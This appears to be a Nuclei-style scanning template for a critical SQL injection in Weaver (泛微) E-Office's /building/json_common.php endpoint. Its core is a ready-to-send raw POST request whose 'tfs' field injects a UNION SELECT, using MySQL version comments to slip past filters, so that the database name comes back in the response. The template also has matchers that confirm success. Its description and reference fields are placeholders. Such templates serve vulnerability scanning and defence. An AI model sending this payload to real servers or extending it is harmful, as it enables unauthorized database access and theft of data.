id: fanwei_eoffice_json_common_sqli
info:
  name: 泛微E-Office json_common.php文件存在sql注入漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |+
        POST /building/json_common.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 83

        tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,database() ,4#|2|333
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: word
        part: body
        words:
          - "eoffice"